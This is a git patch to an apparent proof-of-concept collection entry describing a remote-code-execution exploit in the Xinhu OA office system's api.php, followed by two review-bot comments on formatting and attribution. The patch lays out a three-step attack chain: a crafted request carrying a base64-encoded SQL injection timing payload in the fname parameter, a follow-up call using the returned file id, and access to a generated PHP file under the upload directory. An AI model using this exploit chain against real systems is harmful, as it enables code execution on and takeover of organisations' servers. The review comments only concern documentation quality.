From 12144bb68e7ae3b4e4967bbb9ced00d13e44ab02 Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Mon, 31 Mar 2025 14:37:28 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E4=BF=A1=E5=91=BCOA=E5=8A=9E=E5=85=AC?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=E5=90=8E=E5=8F=B0api.php=E6=8E=A5=E5=8F=A3?= =?UTF-8?q?=E5=AD=98=E5=9C=A8RCE.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../信呼OA办公系统后台api.php接口存在RCE.md | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md b/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md index 511ff5f..90cd9f3 100644 --- a/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md +++ b/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md @@ -8,7 +8,7 @@ icon_hash="1652488516" ``` -## poc +## 第一步 ```javascript GET /xhoa/api.php?a=getmfilv&m=upload|api&d=task&fileid=1&fname=MScgYW5kIHNsZWVwKDYpIw== HTTP/1.1 @@ -28,10 +28,19 @@ sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" ``` -![image-20241128092859877](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280928931.png) +![image](https://github.com/user-attachments/assets/0f95005f-8c4f-45a0-bed2-eba493c7b87a) +## 第二步 +```javascript +访问:http://xxxx/api.php?a=getmfilv&m=upload|api&d=task&fileid=返回的id值 +``` -## 漏洞来源 +![image](https://github.com/user-attachments/assets/ba6f7a2e-8c59-4c08-a87f-8f778d2ee1c4) + +## 第三步 +``` +通过前面第二部获取的地址直接访问即可 +http://localhost/upload/2025-03/26_rocktpl5661_1363.php +``` -- https://forum.butian.net/article/613
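Review bot: In the first hunk, the new heading `## 第一步` ("Step one") replaces `## poc` but says nothing about what the request underneath is for, and the context line that opens the block still tags a raw HTTP request as `javascript`. I would give each step heading a short description of its purpose, tag the request block `http`, and add a sentence explaining the base64 `fname` parameter. As written, a reader triaging this entry cannot tell what the request tests without decoding the value themselves.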
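Review bot: The second hunk deletes the `## 漏洞来源` ("Vulnerability source") section and its `https://forum.butian.net/article/613` link, which leaves the write-up without attribution or a reference that readers can follow for affected versions and the fix. Please keep that section below the new steps. Smaller points in the added lines: `第二部` in step three looks like a typo for `第二步`. The step-two block is tagged `javascript` although it contains a sentence and a URL, while the step-three block has no tag at all. `http://localhost/upload/2025-03/26_rocktpl5661_1363.php` is a path from one test instance and should be labelled as sample output, since the generated file name will differ per install. Both new images use the bare alt text `image`, which is worth replacing with a description of what each screenshot shows.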